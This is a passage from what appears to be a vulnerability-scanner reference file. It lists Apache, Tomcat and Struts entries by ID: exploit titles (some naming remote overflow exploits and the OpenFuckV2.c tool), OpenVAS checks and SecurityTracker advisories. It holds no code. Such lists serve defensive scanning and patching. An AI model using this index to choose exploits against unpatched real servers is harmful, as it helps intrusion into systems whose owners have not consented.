15551| [21885] Apache 1.3/2.0.x Server Side Include Cross Site Scripting Vulnerability
15552| [21882] Apache Tomcat 3.2 Directory Disclosure Vulnerability
15553| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
15554| [21853] Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability
15555| [21734] Apache Tomcat 4.1 JSP Request Cross Site Scripting Vulnerability
15556| [21719] Apache 2.0 Path Disclosure Vulnerability
15557| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
15558| [21605] Apache Tomcat 4.0.3 DoS Device Name Cross Site Scripting Vulnerability
15559| [21604] Apache Tomcat 4.0.3 Servlet Mapping Cross Site Scripting Vulnerability
15560| [21560] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (2)
15561| [21559] Apache 1.x/2.0.x Chunked-Encoding Memory Corruption Vulnerability (1)
15562| [21534] Apache Tomcat 3/4 JSP Engine Denial of Service Vulnerability
15563| [21492] Apache Tomcat 3.2.3/3.2.4 RealPath.JSP Malformed Request Information Disclosure
15564| [21491] Apache Tomcat 3.2.3/3.2.4 Example Files Web Root Path Disclosure
15565| [21490] Apache Tomcat 3.2.3/3.2.4 Source.JSP Malformed Request Information Disclosure
15566| [21412] Apache Tomcat 4.0/4.1 Servlet Path Disclosure Vulnerability
15567| [21350] Apache Win32 1.3.x/2.0.x Batch File Remote Command Execution Vulnerability
15568| [21204] Apache 1.3.20 Win32 PHP.EXE Remote File Disclosure Vulnerability
15569| [21112] Red Hat Linux 7.0 Apache Remote Username Enumeration Vulnerability
15570| [21067] Apache 1.0/1.2/1.3 Server Address Disclosure Vulnerability
15571| [21002] Apache 1.3 Possible Directory Index Disclosure Vulnerability
15572| [20911] Apache 1.3.14 Mac File Protection Bypass Vulnerability
15573| [20716] apache tomcat 3.0 - Directory Traversal vulnerability
15574| [20695] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (4)
15575| [20694] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (3)
15576| [20693] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (2)
15577| [20692] Apache 1.3 Artificially Long Slash Path Directory Listing Vulnerability (1)
15578| [20595] NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability
15579| [20558] Apache 1.2 Web Server DoS Vulnerability
15580| [20466] Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability
15581| [20435] Apache 0.8.x/1.0.x,NCSA httpd 1.x test-cgi Directory Listing Vulnerability
15582| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
15583| [20210] Apache 1.3.12 WebDAV Directory Listings Vulnerability
15584| [20131] Apache Tomcat 3.1 Path Revealing Vulnerability
15585| [19975] Apache 1.3.6/1.3.9/1.3.11/1.3.12/1.3.20 Root Directory Access Vulnerability
15586| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
15587| [19536] Apache <= 1.1,NCSA httpd <= 1.5.2,Netscape Server 1.12/1.1/2.0 a nph-test-cgi Vulnerability
15588| [19231] PHP apache_request_headers Function Buffer Overflow
15589| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
15590| [18897] Oracle Weblogic Apache Connector POST Request Buffer Overflow
15591| [18619] Apache Tomcat Remote Exploit (PUT Request) and Account Scanner
15592| [18452] Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities
15593| [18442] Apache httpOnly Cookie Disclosure
15594| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
15595| [18221] Apache HTTP Server Denial of Service
15596| [17969] Apache mod_proxy Reverse Proxy Exposure Vulnerability PoC
15597| [17696] Apache httpd Remote Denial of Service (memory exhaustion)
15598| [17691] Apache Struts < 2.2.0 - Remote Command Execution
15599| [16798] Apache mod_jk 1.2.20 Buffer Overflow
15600| [16782] Apache Win32 Chunked Encoding
15601| [16752] Apache module mod_rewrite LDAP protocol Buffer Overflow
15602| [16317] Apache Tomcat Manager Application Deployer Authenticated Code Execution
15603| [15710] Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability
15604| [15319] Apache 2.2 (Windows) Local Denial of Service
15605| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
15606| [14489] Apache Tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15607| [12721] Apache Axis2 1.4.1 - Local File Inclusion Vulnerability
15608| [12689] Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console
15609| [12343] Apache Tomcat 5.5.0 to 5.5.29 & 6.0.0 to 6.0.26 - Information Disclosure Vulnerability
15610| [12330] Apache OFBiz - Multiple XSS
15611| [12264] Apache OFBiz - FULLADMIN Creator PoC Payload
15612| [12263] Apache OFBiz - SQL Remote Execution PoC Payload
15613| [11662] Apache Spamassassin Milter Plugin Remote Root Command Execution
15614| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
15615| [10811] Joomla.Tutorials GHDB: Apache directory listing Download Vulnerability
15616| [10292] Apache Tomcat 3.2.1 - 404 Error Page Cross Site Scripting Vulnerability
15617| [9995] Apache Tomcat Form Authentication Username Enumeration Weakness
15618| [9994] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
15619| [9993] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15620| [8842] Apache mod_dav / svn Remote Denial of Service Exploit
15621| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
15622| [7264] Apache Tomcat runtime.getRuntime().exec() Privilege Escalation (win)
15623| [6229] apache tomcat < 6.0.18 utf8 - Directory Traversal vulnerability
15624| [6100] Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
15625| [6089] Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
15626| [5386] Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
15627| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
15628| [4552] Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
15629| [4530] Apache Tomcat (webdav) Remote File Disclosure Exploit
15630| [4162] Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
15631| [4093] Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
15632| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
15633| [3680] Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
15634| [3384] Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit
15635| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
15636| [2061] Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
15637| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
15638| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
15639| [764] Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c)
15640| [587] Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit
15641| [466] htpasswd Apache 1.3.31 - Local Exploit
15642| [371] Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)
15643| [360] Apache HTTPd Arbitrary Long HTTP Headers DoS
15644| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
15645| [126] Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit
15646| [67] Apache 1.3.x mod_mylo Remote Code Execution Exploit
15647| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
15648| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
15649| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
15650| [9] Apache HTTP Server 2.x Memory Leak Exploit
15651|
15652| OpenVAS (Nessus) - http://www.openvas.org:
15653| [902924] Apache Struts2 Showcase Skill Name Remote Code Execution Vulnerability
15654| [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows)
15655| [902830] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
15656| [902664] Apache Traffic Server HTTP Host Header Denial of Service Vulnerability
15657| [901203] Apache httpd Web Server Range Header Denial of Service Vulnerability
15658| [901110] Apache ActiveMQ Source Code Information Disclosure Vulnerability
15659| [901105] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
15660| [900842] Apache 'mod_proxy_ftp' Module Command Injection Vulnerability (Linux)
15661| [900841] Apache 'mod_proxy_ftp' Module Denial Of Service Vulnerability (Linux)
15662| [900573] Apache APR-Utils XML Parser Denial of Service Vulnerability
15663| [900572] Apache APR-Utils Multiple Denial of Service Vulnerabilities
15664| [900571] Apache APR-Utils Version Detection
15665| [900499] Apache mod_proxy_ajp Information Disclosure Vulnerability
15666| [900496] Apache Tiles Multiple XSS Vulnerability
15667| [900493] Apache Tiles Version Detection
15668| [900107] Apache mod_proxy_ftp Wildcard Characters XSS Vulnerability
15669| [900021] Apache Tomcat Cross-Site Scripting and Security Bypass Vulnerabilities
15670| [880086] CentOS Update for apache CESA-2008:0004-01 centos2 i386
15671| [870175] RedHat Update for apache RHSA-2008:0004-01
15672| [864591] Fedora Update for apache-poi FEDORA-2012-10835
15673| [864383] Fedora Update for apache-commons-compress FEDORA-2012-8428
15674| [864280] Fedora Update for apache-commons-compress FEDORA-2012-8465
15675| [864250] Fedora Update for apache-poi FEDORA-2012-7683
15676| [864249] Fedora Update for apache-poi FEDORA-2012-7686
15677| [863993] Fedora Update for apache-commons-daemon FEDORA-2011-10880
15678| [863466] Fedora Update for apache-commons-daemon FEDORA-2011-10936
15679| [855821] Solaris Update for Apache 1.3 122912-19
15680| [855812] Solaris Update for Apache 1.3 122911-19
15681| [855737] Solaris Update for Apache 1.3 122911-17
15682| [855731] Solaris Update for Apache 1.3 122912-17
15683| [855695] Solaris Update for Apache 1.3 122911-16
15684| [855645] Solaris Update for Apache 1.3 122912-16
15685| [855587] Solaris Update for kernel update and Apache 108529-29
15686| [855566] Solaris Update for Apache 116973-07
15687| [855531] Solaris Update for Apache 116974-07
15688| [855524] Solaris Update for Apache 2 120544-14
15689| [855494] Solaris Update for Apache 1.3 122911-15
15690| [855478] Solaris Update for Apache Security 114145-11
15691| [855472] Solaris Update for Apache Security 113146-12
15692| [855179] Solaris Update for Apache 1.3 122912-15
15693| [855147] Solaris Update for kernel update and Apache 108528-29
15694| [855077] Solaris Update for Apache 2 120543-14
15695| [850196] SuSE Update for apache2 openSUSE-SU-2012:0314-1 (apache2)
15696| [850088] SuSE Update for apache2 SUSE-SA:2007:061
15697| [850009] SuSE Update for apache2,apache SUSE-SA:2008:021
15698| [841209] Ubuntu Update for apache2 USN-1627-1
15699| [840900] Ubuntu Update for apache2 USN-1368-1
15700| [840798] Ubuntu Update for apache2 USN-1259-1
15701| [840734] Ubuntu Update for apache2 USN-1199-1
15702| [840542] Ubuntu Update for apache2 vulnerabilities USN-1021-1
15703| [840504] Ubuntu Update for apache2 vulnerability USN-990-2
15704| [840399] Ubuntu Update for apache2 vulnerabilities USN-908-1
15705| [840304] Ubuntu Update for apache2 vulnerabilities USN-575-1
15706| [840118] Ubuntu Update for libapache2-mod-perl2 vulnerability USN-488-1
15707| [840092] Ubuntu Update for apache2 vulnerabilities USN-499-1
15708| [840039] Ubuntu Update for libapache2-mod-python vulnerability USN-430-1
15709| [835253] HP-UX Update for Apache Web Server HPSBUX02645
15710| [835247] HP-UX Update for Apache-based Web Server HPSBUX02612
15711| [835243] HP-UX Update for Apache Running Tomcat Servlet Engine HPSBUX02579
15712| [835236] HP-UX Update for Apache with PHP HPSBUX02543
15713| [835233] HP-UX Update for Apache-based Web Server HPSBUX02531
15714| [835224] HP-UX Update for Apache-based Web Server HPSBUX02465
15715| [835200] HP-UX Update for Apache Web Server Suite HPSBUX02431
15716| [835190] HP-UX Update for Apache Web Server Suite HPSBUX02401
15717| [835188] HP-UX Update for Apache HPSBUX02308
15718| [835181] HP-UX Update for Apache With PHP HPSBUX02332
15719| [835180] HP-UX Update for Apache with PHP HPSBUX02342
15720| [835172] HP-UX Update for Apache HPSBUX02365
15721| [835168] HP-UX Update for Apache HPSBUX02313
15722| [835148] HP-UX Update for Apache HPSBUX01064
15723| [835139] HP-UX Update for Apache with PHP HPSBUX01090
15724| [835131] HP-UX Update for Apache HPSBUX00256
15725| [835119] HP-UX Update for Apache Remote Execution of Arbitrary Code HPSBUX02186
15726| [835104] HP-UX Update for Apache HPSBUX00224
15727| [835103] HP-UX Update for Apache mod_cgid HPSBUX00301
15728| [835101] HP-UX Update for Apache HPSBUX01232
15729| [835080] HP-UX Update for Apache HPSBUX02273
15730| [835078] HP-UX Update for ApacheStrong HPSBUX00255
15731| [835044] HP-UX Update for Apache HPSBUX01019
15732| [835040] HP-UX Update for Apache PHP HPSBUX00207
15733| [835025] HP-UX Update for Apache HPSBUX00197
15734| [835023] HP-UX Update for Apache HPSBUX01022
15735| [835022] HP-UX Update for Apache HPSBUX02292
15736| [835005] HP-UX Update for Apache HPSBUX02262
15737| [831759] Mandriva Update for apache-mod_security MDVSA-2012:182 (apache-mod_security)
15738| [831737] Mandriva Update for apache MDVSA-2012:154-1 (apache)
15739| [831534] Mandriva Update for apache MDVSA-2012:012 (apache)
15740| [831523] Mandriva Update for apache MDVSA-2012:003 (apache)
15741| [831491] Mandriva Update for apache MDVSA-2011:168 (apache)
15742| [831460] Mandriva Update for apache MDVSA-2011:144 (apache)
15743| [831449] Mandriva Update for apache MDVSA-2011:130 (apache)
15744| [831357] Mandriva Update for apache MDVSA-2011:057 (apache)
15745| [831132] Mandriva Update for apache MDVSA-2010:153 (apache)
15746| [831131] Mandriva Update for apache MDVSA-2010:152 (apache)
15747| [830989] Mandriva Update for apache-mod_auth_shadow MDVSA-2010:081 (apache-mod_auth_shadow)
15748| [830931] Mandriva Update for apache MDVSA-2010:057 (apache)
15749| [830926] Mandriva Update for apache MDVSA-2010:053 (apache)
15750| [830918] Mandriva Update for apache-mod_security MDVSA-2010:050 (apache-mod_security)
15751| [830799] Mandriva Update for apache-conf MDVSA-2009:300-2 (apache-conf)
15752| [830797] Mandriva Update for apache-conf MDVSA-2009:300-1 (apache-conf)
15753| [830791] Mandriva Update for apache-conf MDVA-2010:011 (apache-conf)
15754| [830652] Mandriva Update for apache MDVSA-2008:195 (apache)
15755| [830621] Mandriva Update for apache-conf MDVA-2008:129 (apache-conf)
15756| [830581] Mandriva Update for apache MDVSA-2008:016 (apache)
15757| [830294] Mandriva Update for apache MDKSA-2007:140 (apache)
15758| [830196] Mandriva Update for apache MDKSA-2007:235 (apache)
15759| [830112] Mandriva Update for apache MDKSA-2007:127 (apache)
15760| [830109] Mandriva Update for apache-mod_perl MDKSA-2007:083 (apache-mod_perl)
15761| [802425] Apache Struts2 Showcase Arbitrary Java Method Execution vulnerability
15762| [802423] Apache Struts CookBook/Examples Multiple Cross-Site Scripting Vulnerabilities
15763| [802422] Apache Struts Showcase Multiple Persistence Cross-Site Scripting Vulnerabilities
15764| [802415] Apache Tomcat Multiple Security Bypass Vulnerabilities (Win)
15765| [802385] Apache Tomcat Request Object Security Bypass Vulnerability (Win)
15766| [802384] Apache Tomcat Parameter Handling Denial of Service Vulnerability (Win)
15767| [802378] Apache Tomcat Hash Collision Denial Of Service Vulnerability
15768| [801942] Apache Archiva Multiple Vulnerabilities
15769| [801940] Apache Struts2 'XWork' Information Disclosure Vulnerability
15770| [801663] Apache Struts2/XWork Remote Command Execution Vulnerability
15771| [801521] Apache APR-util 'buckets/apr_brigade.c' Denial Of Service Vulnerability
15772| [801284] Apache Derby Information Disclosure Vulnerability
15773| [801203] Apache ActiveMQ Persistent Cross-Site Scripting Vulnerability
15774| [800837] Apache 'mod_deflate' Denial Of Service Vulnerability - July09
15775| [800827] Apache 'mod_proxy_http.c' Denial Of Service Vulnerability
15776| [800680] Apache APR Version Detection
15777| [800679] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
15778| [800678] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
15779| [800677] Apache Roller Version Detection
15780| [800279] Apache mod_jk Module Version Detection
15781| [800278] Apache Struts Cross Site Scripting Vulnerability
15782| [800277] Apache Tomcat mod_jk Information Disclosure Vulnerability
15783| [800276] Apache Struts Version Detection
15784| [800271] Apache Struts Directory Traversal Vulnerability
15785| [800024] Apache Tomcat RemoteFilterValve Security Bypass Vulnerability
15786| [103333] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
15787| [103293] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
15788| [103122] Apache Web Server ETag Header Information Disclosure Weakness
15789| [103074] Apache Continuum Cross Site Scripting Vulnerability
15790| [103073] Apache Continuum Detection
15791| [103053] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
15792| [101023] Apache Open For Business Weak Password security check
15793| [101020] Apache Open For Business HTML injection vulnerability
15794| [101019] Apache Open For Business service detection
15795| [100924] Apache Archiva Cross Site Request Forgery Vulnerability
15796| [100923] Apache Archiva Detection
15797| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
15798| [100814] Apache Axis2 Document Type Declaration Processing Security Vulnerability
15799| [100813] Apache Axis2 Detection
15800| [100797] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
15801| [100795] Apache Derby Detection
15802| [100762] Apache CouchDB Cross Site Request Forgery Vulnerability
15803| [100725] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
15804| [100613] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
15805| [100514] Apache Multiple Security Vulnerabilities
15806| [100211] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
15807| [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
15808| [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
15809| [100130] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
15810| [72626] Debian Security Advisory DSA 2579-1 (apache2)
15811| [72612] FreeBSD Ports: apache22
15812| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
15813| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
15814| [71512] FreeBSD Ports: apache
15815| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
15816| [71256] Debian Security Advisory DSA 2452-1 (apache2)
15817| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
15818| [70737] FreeBSD Ports: apache
15819| [70724] Debian Security Advisory DSA 2405-1 (apache2)
15820| [70600] FreeBSD Ports: apache
15821| [70253] FreeBSD Ports: apache, apache-event, apache-itk, apache-peruser, apache-worker
15822| [70235] Debian Security Advisory DSA 2298-2 (apache2)
15823| [70233] Debian Security Advisory DSA 2298-1 (apache2)
15824| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
15825| [69338] Debian Security Advisory DSA 2202-1 (apache2)
15826| [67868] FreeBSD Ports: apache
15827| [66816] FreeBSD Ports: apache
15828| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
15829| [66414] Mandriva Security Advisory MDVSA-2009:323 (apache)
15830| [66106] SuSE Security Advisory SUSE-SA:2009:050 (apache2,libapr1)
15831| [66081] SLES11: Security update for Apache 2
15832| [66074] SLES10: Security update for Apache 2
15833| [66070] SLES9: Security update for Apache 2
15834| [65998] SLES10: Security update for apache2-mod_python
15835| [65893] SLES10: Security update for Apache 2
15836| [65888] SLES10: Security update for Apache 2
15837| [65575] SLES9: Security update for apache2,apache2-prefork,apache2-worker
15838| [65510] SLES9: Security update for Apache 2
15839| [65472] SLES9: Security update for Apache
15840| [65467] SLES9: Security update for Apache
15841| [65450] SLES9: Security update for apache2
15842| [65390] SLES9: Security update for Apache2
15843| [65363] SLES9: Security update for Apache2
15844| [65309] SLES9: Security update for Apache and mod_ssl
15845| [65296] SLES9: Security update for webdav apache module
15846| [65283] SLES9: Security update for Apache2
15847| [65249] SLES9: Security update for Apache 2
15848| [65230] SLES9: Security update for Apache 2
15849| [65228] SLES9: Security update for Apache 2
15850| [65212] SLES9: Security update for apache2-mod_python
15851| [65209] SLES9: Security update for apache2-worker
15852| [65207] SLES9: Security update for Apache 2
15853| [65168] SLES9: Security update for apache2-mod_python
15854| [65142] SLES9: Security update for Apache2
15855| [65136] SLES9: Security update for Apache 2
15856| [65132] SLES9: Security update for apache
15857| [65131] SLES9: Security update for Apache 2 oes/CORE
15858| [65113] SLES9: Security update for apache2
15859| [65072] SLES9: Security update for apache and mod_ssl
15860| [65017] SLES9: Security update for Apache 2
15861| [64950] Mandrake Security Advisory MDVSA-2009:240 (apache)
15862| [64783] FreeBSD Ports: apache
15863| [64774] Ubuntu USN-802-2 (apache2)
15864| [64653] Ubuntu USN-813-2 (apache2)
15865| [64559] Debian Security Advisory DSA 1834-2 (apache2)
15866| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
15867| [64527] Mandrake Security Advisory MDVSA-2009:184 (apache-mod_security)
15868| [64526] Mandrake Security Advisory MDVSA-2009:183 (apache-mod_security)
15869| [64500] Mandrake Security Advisory MDVSA-2009:168 (apache)
15870| [64443] Ubuntu USN-802-1 (apache2)
15871| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
15872| [64423] Debian Security Advisory DSA 1834-1 (apache2)
15873| [64391] Mandrake Security Advisory MDVSA-2009:149 (apache)
15874| [64377] Mandrake Security Advisory MDVSA-2009:124-1 (apache)
15875| [64251] Debian Security Advisory DSA 1816-1 (apache2)
15876| [64201] Ubuntu USN-787-1 (apache2)
15877| [64140] Mandrake Security Advisory MDVSA-2009:124 (apache)
15878| [64136] Mandrake Security Advisory MDVSA-2009:102 (apache)
15879| [63565] FreeBSD Ports: apache
15880| [63562] Ubuntu USN-731-1 (apache2)
15881| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
15882| [61185] FreeBSD Ports: apache
15883| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
15884| [60387] Slackware Advisory SSA:2008-045-02 apache
15885| [58826] FreeBSD Ports: apache-tomcat
15886| [58825] FreeBSD Ports: apache-tomcat
15887| [58804] FreeBSD Ports: apache
15888| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
15889| [58360] Debian Security Advisory DSA 1312-1 (libapache-mod-jk)
15890| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
15891| [57788] Debian Security Advisory DSA 1247-1 (libapache-mod-auth-kerb)
15892| [57335] Debian Security Advisory DSA 1167-1 (apache)
15893| [57201] Debian Security Advisory DSA 1131-1 (apache)
15894| [57200] Debian Security Advisory DSA 1132-1 (apache2)
15895| [57168] Slackware Advisory SSA:2006-209-01 Apache httpd
15896| [57145] FreeBSD Ports: apache
15897| [56731] Slackware Advisory SSA:2006-129-01 Apache httpd
15898| [56729] Slackware Advisory SSA:2006-130-01 Apache httpd redux
15899| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
15900| [56212] Debian Security Advisory DSA 952-1 (libapache-auth-ldap)
15901| [56115] Debian Security Advisory DSA 935-1 (libapache2-mod-auth-pgsql)
15902| [56067] FreeBSD Ports: apache
15903| [55803] Slackware Advisory SSA:2005-310-04 apache
15904| [55519] Debian Security Advisory DSA 839-1 (apachetop)
15905| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
15906| [55355] FreeBSD Ports: apache
15907| [55284] Debian Security Advisory DSA 807-1 (libapache-mod-ssl)
15908| [55261] Debian Security Advisory DSA 805-1 (apache2)
15909| [55259] Debian Security Advisory DSA 803-1 (apache)
15910| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
15911| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
15912| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
15913| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
15914| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
15915| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
15916| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
15917| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
15918| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
15919| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
15920| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
15921| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
15922| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
15923| [54439] FreeBSD Ports: apache
15924| [53931] Slackware Advisory SSA:2004-133-01 apache
15925| [53903] Slackware Advisory SSA:2004-299-01 apache, mod_ssl, php
15926| [53902] Slackware Advisory SSA:2004-305-01 apache+mod_ssl
15927| [53878] Slackware Advisory SSA:2003-308-01 apache security update
15928| [53851] Debian Security Advisory DSA 135-1 (libapache-mod-ssl)
15929| [53849] Debian Security Advisory DSA 132-1 (apache-ssl)
15930| [53848] Debian Security Advisory DSA 131-1 (apache)
15931| [53784] Debian Security Advisory DSA 021-1 (apache)
15932| [53738] Debian Security Advisory DSA 195-1 (apache-perl)
15933| [53737] Debian Security Advisory DSA 188-1 (apache-ssl)
15934| [53735] Debian Security Advisory DSA 187-1 (apache)
15935| [53703] Debian Security Advisory DSA 532-1 (libapache-mod-ssl)
15936| [53577] Debian Security Advisory DSA 120-1 (libapache-mod-ssl, apache-ssl)
15937| [53568] Debian Security Advisory DSA 067-1 (apache,apache-ssl)
15938| [53519] Debian Security Advisory DSA 689-1 (libapache-mod-python)
15939| [53433] Debian Security Advisory DSA 181-1 (libapache-mod-ssl)
15940| [53282] Debian Security Advisory DSA 594-1 (apache)
15941| [53248] Debian Security Advisory DSA 558-1 (libapache-mod-dav)
15942| [53224] Debian Security Advisory DSA 532-2 (libapache-mod-ssl)
15943| [53215] Debian Security Advisory DSA 525-1 (apache)
15944| [53151] Debian Security Advisory DSA 452-1 (libapache-mod-python)
15945| [52529] FreeBSD Ports: apache+ssl
15946| [52501] FreeBSD Ports: apache
15947| [52461] FreeBSD Ports: apache
15948| [52390] FreeBSD Ports: apache
15949| [52389] FreeBSD Ports: apache
15950| [52388] FreeBSD Ports: apache
15951| [52383] FreeBSD Ports: apache
15952| [52339] FreeBSD Ports: apache+mod_ssl
15953| [52331] FreeBSD Ports: apache
15954| [52329] FreeBSD Ports: ru-apache+mod_ssl
15955| [52314] FreeBSD Ports: apache
15956| [52310] FreeBSD Ports: apache
15957| [15588] Detect Apache HTTPS
15958| [15555] Apache mod_proxy content-length buffer overflow
15959| [15554] Apache mod_include priviledge escalation
15960| [14771] Apache <= 1.3.33 htpasswd local overflow
15961| [14177] Apache mod_access rule bypass
15962| [13644] Apache mod_rootme Backdoor
15963| [12293] Apache Input Header Folding and mod_ssl ssl_io_filter_cleanup DoS Vulnerabilities
15964| [12280] Apache Connection Blocking Denial of Service
15965| [12239] Apache Error Log Escape Sequence Injection
15966| [12123] Apache Tomcat source.jsp malformed request information disclosure
15967| [12085] Apache Tomcat servlet/JSP container default files
15968| [11438] Apache Tomcat Directory Listing and File disclosure
15969| [11204] Apache Tomcat Default Accounts
15970| [11092] Apache 2.0.39 Win32 directory traversal
15971| [11046] Apache Tomcat TroubleShooter Servlet Installed
15972| [11042] Apache Tomcat DOS Device Name XSS
15973| [11041] Apache Tomcat /servlet Cross Site Scripting
15974| [10938] Apache Remote Command Execution via .bat files
15975| [10839] PHP.EXE / Apache Win32 Arbitrary File Reading Vulnerability
15976| [10773] MacOS X Finder reveals contents of Apache Web files
15977| [10766] Apache UserDir Sensitive Information Disclosure
15978| [10756] MacOS X Finder reveals contents of Apache Web directories
15979| [10752] Apache Auth Module SQL Insertion Attack
15980| [10704] Apache Directory Listing
15981| [10678] Apache /server-info accessible
15982| [10677] Apache /server-status accessible
15983| [10440] Check for Apache Multiple / vulnerability
15984|
15985| SecurityTracker - https://www.securitytracker.com:
15986| [1028865] Apache Struts Bugs Permit Remote Code Execution and URL Redirection Attacks
15987| [1028864] Apache Struts Wildcard Matching and Expression Evaluation Bugs Let Remote Users Execute Arbitrary Code
15988| [1028824] Apache mod_dav_svn URI Processing Flaw Lets Remote Users Deny Service
15989| [1028823] Apache Unspecified Flaw in mod_session_dbd Has Unspecified Impact
15990| [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks
15991| [1028722] (Red Hat Issues Fix for JBoss) Apache Tomcat Lets Remote Users Conduct DIGEST Authentication Replay Attacks
15992| [1028693] (Red Hat Issues Fix) Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15993| [1028622] Apache Struts 'includeParams' Bugs Permit Remote Command Execution and Cross-Site Scripting Attacks
15994| [1028621] Apache Subversion Bugs Let Remote Authenticated Users Execute Arbitrary Commands and Deny Service
15995| [1028540] Apache mod_rewrite Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
15996| [1028534] Apache Tomcat FORM Authenticator Lets Remote Users Conduct Session Fixation Attacks
15997| [1028533] Apache Tomcat Lack of Chunked Transfer Encoding Extension Size Limit Lets Remote Users Deny Service
15998| [1028532] Apache Tomcat AsyncListeners Bug May Disclose Information from One Request to Another User
15999| [1028515] Apache VCL Input Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
16000| [1028457] Apache ActiveMQ Bugs Let Remote Users Conduct Cross-Site Scripting Attacks, Deny Service, and Obtain Potentially Sensitive Information
16001| [1028287] Apache CXF WSS4JInInterceptor Grants Service Access to Remote Users
